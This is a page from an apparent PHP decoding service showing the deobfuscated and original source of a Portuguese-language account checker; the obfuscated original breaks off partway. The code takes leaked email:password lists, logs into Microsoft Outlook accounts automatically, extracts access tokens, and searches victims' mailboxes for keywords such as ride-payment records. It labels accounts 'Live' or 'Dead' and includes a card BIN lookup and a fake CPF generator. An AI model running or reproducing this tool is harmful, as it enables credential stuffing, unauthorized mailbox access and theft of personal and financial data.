Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php require_once('C:/xampp/htdocs/includes/verification.php'); goto JngNC; Qwj2R: ..
Decoded Output download
<?php
require_once('C:/xampp/htdocs/includes/verification.php');
goto JngNC; Qwj2R: $curl = curl_init($url); goto yoGz5; JngNC: error_reporting(0); goto yqhAm; UnevA: curl_setopt($curl, CURLOPT_POST, true); goto vafsY; u2Zgp: $lista = $_POST["lista"]; goto bYtwA; LIczG: $Login = curl_exec($curl); goto iZJ8F; oJ3mh: $headers = array("Host: outlook.live.com", "upgrade-insecure-requests: 1", "dnt: 1", "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7"); goto ewMwF; Fnk0L: function generate_email() { $domains = array("gmail.com", "hotmail.com", "yahoo.com", "outlook.com"); $domain = $domains[array_rand($domains)]; $timestamp = time(); $random_num = mt_rand(1, 10000); $email = "user_" . $timestamp . "_" . $random_num . "@{$domain}"; return $email; } goto u2Zgp; VO1DE: function trazer($string, $start, $end) { $str = explode($start, $string); $str = explode($end, $str[1]); return $str[0]; } goto dy0pD; Z6vHZ: $token = urlencode(trazer($pegar_tk, "name="PPFT" id="i0327" value="", """)); goto hjtmy; cE9Q7: curl_setopt($curl, CURLOPT_URL, $url); goto KsiV5; gfabt: $palavrachave = trim($_POST["palavrachave"]); goto JvE3b; JvE3b: $url = "https://outlook.live.com/owa/?nlp=1"; goto Qwj2R; wWtk3: curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); goto sP_ta; hjtmy: $url = trazer($pegar_tk, "urlPostMsa:'", "'"); goto xzAul; QX0eH: $Login2 = curl_exec($curl); goto BtuTT; KsiV5: curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); goto wl0mx; d_PL_: curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); goto xFE9K; YQ9Pd: curl_setopt($curl, CURLOPT_URL, $url); goto jDUzV; rNEo1: curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); goto TtEN8; TtEN8: curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); goto dXbPu; n4qBF: $headers = array("Host: login.live.com", "Upgrade-Insecure-Requests: 1", "DNT: 1", "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7"); goto AVWL_; Sh_8C: curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "/cookie.txt"); goto U9SxT; AifEm: curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "/cookie.txt"); goto HbTSX; oTryB: function bin($cartao) { $contents = file_get_contents("../bins.csv"); $pattern = preg_quote(substr($cartao, 0, 6), "/"); $pattern = "/^.*{$pattern}.*$/m"; if (preg_match_all($pattern, $contents, $matches)) { $encontrada = implode("\xa", $matches[0]); } $pieces = explode(";", $encontrada); $resultado = array("string" => "{$pieces["1"]} - {$pieces["2"]} - {$pieces["3"]} - {$pieces["4"]} - {$pieces["5"]}", "pieces1" => "{$pieces["1"]} - {$pieces["4"]} - {$pieces["5"]}"); return $resultado; } goto Z85YX; xzAul: $curl = curl_init($url); goto SRLk3; dXbPu: $get_2 = curl_exec($curl); goto C0yew; ewMwF: curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); goto rNEo1; G70vs: curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "/cookie.txt"); goto n4qBF; dy0pD: function multiexplode($string) { $delimiters = array("|", ";", ":", "/", "\302\273", "\302\xab", ">", "<"); $one = str_replace($delimiters, $delimiters[0], $string); $two = explode($delimiters[0], $one); return $two; } goto oTryB; iQcLE: curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); goto nBUWq; OArEs: $data = "i13=0&login={$email}&loginfmt={$email}&type=11&LoginOptions=3&lrt=&lrtPartition=&hisRegion=&hisScaleUnit=&passwd={$senha}&ps=2&psRNGCDefaultType=&psRNGCEntropy=&psRNGCSLK=&canary=&ctx=&hpgrequestid=&PPFT={$token}&PPSX=Passp&NewUser=1&FoundMSAs=&fspost=0&i21=0&CookieDisclosure=0&IsFidoSupported=1&isSignupPost=0&isRecoveryAttemptPost=0&i19=8008"; goto GzFjD; Z85YX: function gerarCPF() { for ($i = 0; $i < 9; $i++) { $cpf[$i] = mt_rand(0, 9); } $soma = 0; for ($i = 0; $i < 9; $i++) { $soma += $cpf[$i] * (10 - $i); } $resto = $soma % 11; $cpf[9] = $resto < 2 ? 0 : 11 - $resto; $soma = 0; for ($i = 0; $i < 10; $i++) { $soma += $cpf[$i] * (11 - $i); } $resto = $soma % 11; $cpf[10] = $resto < 2 ? 0 : 11 - $resto; return implode('', $cpf); } goto Fnk0L; fs44E: curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); goto TJbyx; iZJ8F: $token2 = trazer($Login, "sFT:'", "'"); goto ohrtF; z4bbP: curl_setopt($curl, CURLOPT_HEADER, true); goto iQcLE; sP_ta: curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); goto QX0eH; H6gE8: curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); goto LIczG; SRLk3: curl_setopt($curl, CURLOPT_URL, $url); goto UnevA; c9nb2: $pegar_tk = curl_exec($curl); goto Z6vHZ; xFE9K: $data = "LoginOptions=3&type=28&ctx=&hpgrequestid=&PPFT=" . urlencode($token2) . "&DontShowAgain=true&i19=4037"; goto EdIdG; yqhAm: if (file_exists("cookie.txt")) { unlink("cookie.txt"); } goto VO1DE; U9SxT: $headers = array("Host: login.live.com", "Cache-Control: max-age=0", "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Content-Type: application/x-www-form-urlencoded"); goto d_PL_; nROrv: $headers = array("Host: login.live.com", "Cache-Control: max-age=0", "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Content-Type: application/x-www-form-urlencoded"); goto mp1p9; jDUzV: curl_setopt($curl, CURLOPT_POST, true); goto fs44E; bYtwA: $email = trim(multiexplode($lista)[0]); goto o62Mj; yoGz5: curl_setopt($curl, CURLOPT_URL, $url); goto z4bbP; GzFjD: curl_setopt($curl, CURLOPT_POSTFIELDS, $data); goto sYdwj; TVS4x: curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "/cookie.txt"); goto oJ3mh; I46rY: $curl = curl_init($url); goto YQ9Pd; mp1p9: curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); goto OArEs; ohrtF: $url = trazer($Login, "urlPost:'", "'"); goto I46rY; o62Mj: $senha = trim(multiexplode($lista)[1]); goto gfabt; LMu8v: $curl = curl_init($url); goto cE9Q7; joD4m: curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); goto c9nb2; wl0mx: curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "/cookie.txt"); goto G70vs; AVWL_: curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); goto tdUoT; vafsY: curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); goto AifEm; tdUoT: curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); goto joD4m; TJbyx: curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "/cookie.txt"); goto Sh_8C; sYdwj: curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); goto H6gE8; nBUWq: curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "/cookie.txt"); goto TVS4x; HbTSX: curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "/cookie.txt"); goto nROrv; C0yew: $url = trim(trazer($get_2, "location: ", "server:")); goto LMu8v; EdIdG: curl_setopt($curl, CURLOPT_POSTFIELDS, $data); goto wWtk3; BtuTT: if (strpos($Login2, "pprid")) { $auth = trazer($Login2, "RpsCsrfState=", "&"); $pprid = trazer($Login2, "name="pprid" id="pprid" value="", """); $NAP = trazer($Login2, "name="NAP" id="NAP" value="", """); $ANON = trazer($Login2, "name="ANON" id="ANON" value="", """); $t = urlencode(trazer($Login2, "name="t" id="t" value="", """)); $url = "https://outlook.live.com/owa/?exch=1&nlp=1&RpsCsrfState={$auth}&wa=wsignin1.0"; $curl = curl_init($url); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "/cookie.txt"); curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "/cookie.txt"); $headers = array("Host: outlook.live.com", "cache-control: max-age=0", "origin: https://login.live.com", "dnt: 1", "upgrade-insecure-requests: 1", "content-type: application/x-www-form-urlencoded", "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "sec-fetch-site: same-site", "sec-fetch-mode: navigate", "sec-fetch-dest: document", "referer: https://login.live.com/", "accept-language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7"); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); $data = "wbids=0&pprid={$pprid}&wbid=MSFT&NAP={$NAP}&ANON={$ANON}&t={$t}"; curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); $resp = curl_exec($curl); $url = "https://outlook.live.com/owa/0/?exch=1&nlp=1&RpsCsrfState={$auth}"; $curl = curl_init($url); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_HEADER, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "/cookie.txt"); curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "/cookie.txt"); $headers = array("Host: outlook.live.com", "cache-control: max-age=0", "dnt: 1", "upgrade-insecure-requests: 1", "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "sec-fetch-site: same-site", "sec-fetch-mode: navigate", "sec-fetch-dest: document", "referer: https://login.live.com/", "accept-language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7"); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); $resp = curl_exec($curl); $canary = trazer($resp, "X-OWA-CANARY=", ";"); $url = "https://outlook.live.com/owa/0/service.svc?action=GetBposShellInfoNavBarData&app=Mail&n=1"; $curl = curl_init($url); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_HEADER, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "/cookie.txt"); curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "/cookie.txt"); $headers = array("Host: outlook.live.com", "prefer: exchange.behavior="IncludeThirdPartyOnlineMeetingProviders"", "dnt: 1", "x-req-source: Mail", "x-owa-canary: {$canary}", "sec-ch-ua-mobile: ?0", "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "x-owa-urlpostdata: %7B%7D", "content-type: application/json; charset=utf-8", "action: GetBposShellInfoNavBarData", "accept: */*", "origin: https://outlook.live.com", "sec-fetch-site: same-origin", "sec-fetch-mode: cors", "sec-fetch-dest: empty", "referer: https://outlook.live.com/", "accept-language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7"); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); $data = "--compressed"; curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); $resp = curl_exec($curl); $canary2 = trazer($resp, "X-OWA-CANARY=", ";"); $url = "https://outlook.live.com/owa/0/service.svc?action=GetAttachmentPreviews&app=Mail&n=9"; $curl = curl_init($url); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_HEADER, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "/cookie.txt"); curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "/cookie.txt"); $headers = array("Host: outlook.live.com", "dnt: 1", "x-req-source: Mail", "x-owa-canary: {$canary2}", "sec-ch-ua-mobile: ?0", "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "content-type: application/json; charset=utf-8", "action: GetAttachmentPreviews", "accept: */*", "origin: https://outlook.live.com", "sec-fetch-site: same-origin", "sec-fetch-mode: cors", "sec-fetch-dest: empty", "referer: https://outlook.live.com/", "accept-language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7"); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); $data = "--compressed"; curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); $resp = curl_exec($curl); $canary3 = trazer($resp, "X-OWA-CANARY=", ";"); $url = "https://outlook.live.com/owa/0/service.svc?action=GetAttachmentPreviews&app=Mail&n=16"; $curl = curl_init($url); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_HEADER, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "/cookie.txt"); curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "/cookie.txt"); $headers = array("Host: outlook.live.com", "dnt: 1", "x-req-source: Mail", "x-owa-canary: {$canary3}", "sec-ch-ua-mobile: ?0", "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "content-type: application/json; charset=utf-8", "action: GetAttachmentPreviews", "accept: */*", "origin: https://outlook.live.com", "sec-fetch-site: same-origin", "sec-fetch-mode: cors", "sec-fetch-dest: empty", "referer: https://outlook.live.com/", "accept-language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7"); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); $data = "--compressed"; curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); $resp = curl_exec($curl); $canary4 = trazer($resp, "X-OWA-CANARY=", ";"); $url = "https://outlook.live.com/owa/0/service.svc?action=GetBposShellInfoNavBarData&app=Mail&n=18"; $curl = curl_init($url); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_HEADER, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "/cookie.txt"); curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "/cookie.txt"); $headers = array("Host: outlook.live.com", "prefer: exchange.behavior="IncludeThirdPartyOnlineMeetingProviders"", "dnt: 1", "x-req-source: Mail", "x-owa-canary: {$canary4}", "sec-ch-ua-mobile: ?0", "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "x-owa-urlpostdata: %7B%7D", "content-type: application/json; charset=utf-8", "action: GetBposShellInfoNavBarData", "accept: */*", "origin: https://outlook.live.com", "sec-fetch-site: same-origin", "sec-fetch-mode: cors", "sec-fetch-dest: empty", "referer: https://outlook.live.com/", "accept-language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7"); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); $data = "--compressed"; curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); $resp = curl_exec($curl); $canary5 = trazer($resp, "X-OWA-CANARY=", ";"); $url = "https://outlook.live.com/owa/0/service.svc?action=GetAccessTokenforResource&UA=0&app=Mail&n=21"; $curl = curl_init($url); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "/cookie.txt"); curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "/cookie.txt"); $headers = array("Host: outlook.live.com", "prefer: exchange.behavior="IncludeThirdPartyOnlineMeetingProviders"", "dnt: 1", "x-req-source: Mail", "x-owa-canary: {$canary5}", "sec-ch-ua-mobile: ?0", "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "x-owa-urlpostdata: %7B%22__type%22%3A%22TokenRequest%3A%23Exchange%22%2C%22Resource%22%3A%22https%3A%2F%2Foutlook.live.com%22%7D", "content-type: application/json; charset=utf-8", "action: GetAccessTokenforResource", "accept: */*", "origin: https://outlook.live.com", "sec-fetch-site: same-origin", "sec-fetch-mode: cors", "sec-fetch-dest: empty", "referer: https://outlook.live.com/", "accept-language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7"); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); $data = "--compressed"; curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); $resp = curl_exec($curl); $key = trazer($resp, ""AccessToken":"", """); $url = "https://outlook.live.com/search/api/v2/query?n=162&cv=P79J1Me7qJtd%2FXk37TRvUI.175"; $curl = curl_init($url); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); $headers = array("Host: outlook.live.com", "x-search-griffin-version: GWSv2", "dnt: 1", "scenariotag: 1stPg_mg", "x-ms-appname: owa-reactmail", "accept-language: pt-BR", "authorization: Bearer {$key}", "x-anchormailbox: SMTP:{$email}", "x-client-flights: OWA_BestMatch_V15,CalendarInsightsFlight,EnablePeoplePillGhostingOWA,CalendarAnswerFlight,CalendarAnswerWithQas,CalendarAnswerConflicts,CalendarInsightsFlight,ConflictsInCalendarInsights,bfbfileansoff,FetchFileArtifacts", "x-req-source: Mail", "sec-ch-ua-mobile: ?0", "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "content-type: application/json", "x-routingparameter-sessionkey: SMTP:{$email}", "accept: */*", "origin: https://outlook.live.com", "sec-fetch-site: same-origin", "sec-fetch-mode: cors", "sec-fetch-dest: empty", "referer: https://outlook.live.com/"); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); $data = "{"Cvid":"a4e28ad5-ca54-aa32-58ce-e2e278b40886","Scenario":{"Name":"owa.react"},"TimeZone":"UTC-02","TextDecorations":"Off","EntityRequests":[{"EntityType":"Message","ContentSources":["Exchange"],"Filter":{"Or":[{"Term":{"DistinguishedFolderName":"msgfolderroot"}},{"Term":{"DistinguishedFolderName":"DeletedItems"}}]},"From":0,"Query":{"QueryString":"" . $palavrachave . ""},"RefiningQueries":null,"Size":25,"Sort":[{"Field":"Score","SortDirection":"Desc","Count":3},{"Field":"Time","SortDirection":"Desc"}],"EnableTopResults":true,"TopResultsCount":3}],"AnswerEntityRequests":[{"Query":{"QueryString":"" . $palavrachave . ""},"EntityTypes":["Event","File"],"From":0,"Size":10,"EnableAsyncResolution":true}],"QueryAlterationOptions":{"EnableSuggestion":true,"EnableAlteration":true,"SupportedRecourseDisplayTypes":["Suggestion","NoResultModification","NoResultFolderRefinerModification","NoRequeryModification","Modification"]},"LogicalId":"3a50ac5c-ecb1-dabb-263a-2ba10309368a"}"; curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); $verificar = curl_exec($curl); if (strpos($verificar, $palavrachave)) { $palavra = "<span class='text-success'>Sim</span>"; if ($palavrachave == "Equipe 99") { if (strpos($verificar, "Cart\xc3\xa3o de Cr\xc3\251dito")) { $cartao = "<span class='text-success'>Sim</span>"; } else { $cartao = "<span class='text-danger'>N\303\xa3o</span>"; } if (strpos($verificar, "Dinheiro")) { $Dinheiro = "<span class='text-success'>Sim</span>"; } else { $Dinheiro = "<span class='text-danger'>N\303\xa3o</span>"; } $msg = trazer($verificar, "Total", "escolher"); $dados = "<span class='text-warning'>[Corridas no Dinheiro:</span> {$Dinheiro}<span class='text-warning'>|Corridas no Cart\303\xa3o:</span> {$cartao}<span class='text-warning'><span class='text-info'>|Ultima Corrida: {$msg} escolher</span><span class='text-warning'>] \xe2\236\234 </span>"; } } else { $palavra = "<span class='text-danger'>N\xc3\243o</span>"; } echo "<br><span class='text-success'>[#Live] \xe2\x9e\x9c </span>
<span class='text-info'>{$lista} \342\x9e\x9c </span>{$dados}\xa <span class='text-warning'>[Contem email relacionado a {$palavrachave}: {$palavra}] \342\236\234</span>
<span class='text-info'>Center-509</span><br>"; curl_close($curl); die; } else { echo "<br><span class='text-warning'>[#Dead] \xe2\236\234 </span>
<span class='text-info'>{$lista} \342\236\x9c </span>\xa <span class='text-danger'>[Your account or password is incorrect] \342\x9e\234 </span>\xa <span class='text-info'>Center-509</span><br>"; curl_close($curl); die; }
?>Did this file decode correctly?
Original Code
<?php
require_once('C:/xampp/htdocs/includes/verification.php');
goto JngNC; Qwj2R: $curl = curl_init($url); goto yoGz5; JngNC: error_reporting(0); goto yqhAm; UnevA: curl_setopt($curl, CURLOPT_POST, true); goto vafsY; u2Zgp: $lista = $_POST["\x6c\151\x73\164\141"]; goto bYtwA; LIczG: $Login = curl_exec($curl); goto iZJ8F; oJ3mh: $headers = array("\x48\x6f\x73\x74\x3a\x20\157\x75\164\x6c\157\157\x6b\56\154\x69\166\145\x2e\x63\157\155", "\x75\x70\x67\162\x61\144\145\x2d\x69\156\x73\x65\x63\165\x72\145\55\162\145\x71\x75\145\163\x74\163\x3a\40\x31", "\x64\x6e\164\x3a\x20\x31", "\165\163\x65\x72\55\141\x67\145\x6e\x74\x3a\40\115\x6f\172\151\x6c\154\x61\x2f\x35\56\x30\40\50\127\x69\156\x64\x6f\x77\x73\40\x4e\x54\x20\61\x30\x2e\60\x3b\x20\127\151\156\66\x34\73\40\170\x36\x34\51\x20\101\160\x70\154\x65\x57\x65\142\x4b\151\164\x2f\x35\x33\67\56\x33\66\40\x28\113\x48\x54\x4d\114\54\x20\154\x69\153\145\x20\x47\145\x63\153\157\51\x20\103\150\x72\157\x6d\x65\x2f\x31\61\64\56\60\56\60\x2e\x30\40\123\x61\x66\x61\162\151\x2f\65\63\x37\x2e\x33\x36", "\141\x63\143\x65\x70\x74\x3a\x20\x74\145\x78\x74\57\x68\164\x6d\x6c\54\x61\160\x70\154\x69\x63\x61\164\x69\157\156\57\170\150\164\x6d\154\53\x78\155\x6c\54\x61\x70\x70\x6c\151\x63\x61\164\151\x6f\156\x2f\x78\x6d\154\73\161\x3d\60\56\71\54\151\x6d\141\x67\145\57\x61\x76\151\x66\54\x69\x6d\x61\x67\x65\57\x77\145\x62\160\54\x69\155\x61\147\145\57\141\160\x6e\x67\x2c\x2a\x2f\x2a\73\x71\75\x30\x2e\x38\54\141\160\160\154\151\143\x61\164\x69\x6f\156\x2f\163\x69\147\x6e\145\144\55\x65\170\143\150\141\156\147\145\x3b\166\x3d\142\x33\x3b\161\x3d\60\56\67"); goto ewMwF; Fnk0L: function generate_email() { $domains = array("\147\x6d\x61\151\154\x2e\x63\x6f\x6d", "\x68\x6f\164\155\141\x69\x6c\56\143\x6f\x6d", "\171\x61\150\157\157\x2e\143\157\155", "\157\165\164\154\x6f\157\153\x2e\x63\x6f\x6d"); $domain = $domains[array_rand($domains)]; $timestamp = time(); $random_num = mt_rand(1, 10000); $email = "\165\x73\x65\162\x5f" . $timestamp . "\x5f" . $random_num . "\100{$domain}"; return $email; } goto u2Zgp; VO1DE: function trazer($string, $start, $end) { $str = explode($start, $string); $str = explode($end, $str[1]); return $str[0]; } goto dy0pD; Z6vHZ: $token = urlencode(trazer($pegar_tk, "\156\x61\x6d\145\x3d\42\120\120\106\x54\x22\40\151\x64\x3d\x22\x69\60\x33\62\67\42\x20\166\x61\x6c\x75\145\x3d\42", "\42")); goto hjtmy; cE9Q7: curl_setopt($curl, CURLOPT_URL, $url); goto KsiV5; gfabt: $palavrachave = trim($_POST["\160\141\154\x61\x76\x72\141\143\150\x61\166\145"]); goto JvE3b; JvE3b: $url = "\150\164\164\160\x73\x3a\x2f\x2f\x6f\165\x74\154\x6f\157\x6b\x2e\154\x69\x76\x65\x2e\143\157\x6d\x2f\x6f\x77\x61\x2f\77\x6e\154\160\x3d\61"; goto Qwj2R; wWtk3: curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); goto sP_ta; hjtmy: $url = trazer($pegar_tk, "\165\162\x6c\120\x6f\163\164\115\163\x61\72\47", "\47"); goto xzAul; QX0eH: $Login2 = curl_exec($curl); goto BtuTT; KsiV5: curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); goto wl0mx; d_PL_: curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); goto xFE9K; YQ9Pd: curl_setopt($curl, CURLOPT_URL, $url); goto jDUzV; rNEo1: curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); goto TtEN8; TtEN8: curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); goto dXbPu; n4qBF: $headers = array("\x48\157\x73\164\72\40\154\x6f\x67\x69\x6e\x2e\154\151\166\145\56\143\157\x6d", "\125\x70\147\162\141\144\145\55\x49\x6e\x73\x65\x63\x75\x72\x65\55\x52\145\x71\165\x65\163\164\163\72\x20\61", "\104\x4e\x54\x3a\40\x31", "\x55\163\145\x72\55\101\147\x65\x6e\164\x3a\40\x4d\157\172\151\154\x6c\141\57\x35\56\x30\x20\50\x57\x69\156\x64\157\167\163\x20\116\x54\40\61\60\x2e\x30\x3b\40\x57\151\x6e\x36\64\x3b\x20\x78\66\x34\x29\x20\x41\x70\160\154\145\x57\x65\x62\x4b\x69\x74\57\x35\63\67\56\x33\x36\x20\50\x4b\110\124\x4d\x4c\54\x20\154\x69\x6b\145\40\x47\145\x63\x6b\x6f\x29\40\103\150\162\157\x6d\145\x2f\61\61\x34\56\x30\56\60\x2e\60\x20\123\x61\146\x61\x72\x69\57\x35\63\x37\56\63\66", "\x41\143\143\145\160\x74\72\x20\164\145\x78\164\57\x68\164\x6d\x6c\x2c\141\160\160\x6c\x69\143\x61\164\x69\157\156\57\x78\x68\x74\x6d\154\x2b\170\155\154\54\x61\x70\x70\x6c\151\x63\x61\x74\151\x6f\156\57\x78\155\x6c\73\x71\x3d\60\x2e\71\x2c\x69\x6d\141\x67\x65\57\141\x76\151\146\54\151\155\141\x67\145\57\x77\x65\142\160\54\x69\155\141\x67\145\57\141\x70\156\x67\54\52\57\52\x3b\x71\75\x30\x2e\x38\54\x61\x70\160\154\151\x63\x61\x74\x69\x6f\x6e\x2f\163\x69\x67\x6e\145\x64\55\145\x78\143\150\141\x6e\147\145\73\166\x3d\x62\63\x3b\161\x3d\60\x2e\x37"); goto AVWL_; Sh_8C: curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "\x2f\x63\x6f\x6f\x6b\151\145\x2e\x74\x78\x74"); goto U9SxT; AifEm: curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "\x2f\143\x6f\x6f\153\151\145\x2e\164\170\x74"); goto HbTSX; oTryB: function bin($cartao) { $contents = file_get_contents("\x2e\56\57\142\151\156\x73\x2e\143\163\x76"); $pattern = preg_quote(substr($cartao, 0, 6), "\x2f"); $pattern = "\57\136\56\x2a{$pattern}\56\52\x24\x2f\x6d"; if (preg_match_all($pattern, $contents, $matches)) { $encontrada = implode("\xa", $matches[0]); } $pieces = 